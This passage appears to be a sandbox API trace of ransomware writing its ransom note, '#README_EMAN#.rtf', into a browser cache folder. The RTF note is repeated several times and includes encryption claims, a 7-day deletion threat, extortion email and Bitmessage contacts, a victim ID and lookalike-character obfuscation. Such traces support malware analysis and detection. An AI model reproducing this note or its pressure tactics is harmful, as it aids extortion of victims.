\\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\n", lpUsedDefaultChar=0x0) returned 8717 [0289.682] WriteFile (in: hFile=0x2cc, lpBuffer=0x235fca8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x235fca8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0289.682] CloseHandle (hObject=0x2cc) returned 1 [0289.682] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Service Worker\\CacheStorage\\e6622492fa163609ddd4212f54512baa07929ed3\\bf8f082f-6a47-47c8-a2cc-2761ce03ff32\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\service worker\\cachestorage\\e6622492fa163609ddd4212f54512baa07929ed3\\bf8f082f-6a47-47c8-a2cc-2761ce03ff32\\#readme_eman#.rtf")) returned 0xffffffff [0289.682] GetLastError () returned 0x2 [0289.682] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Service Worker\\CacheStorage\\e6622492fa163609ddd4212f54512baa07929ed3\\bf8f082f-6a47-47c8-a2cc-2761ce03ff32\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\service worker\\cachestorage\\e6622492fa163609ddd4212f54512baa07929ed3\\bf8f082f-6a47-47c8-a2cc-2761ce03ff32\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2cc [0289.683] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0289.683] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0289.683] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x235fca8, cbMultiByte=8717, 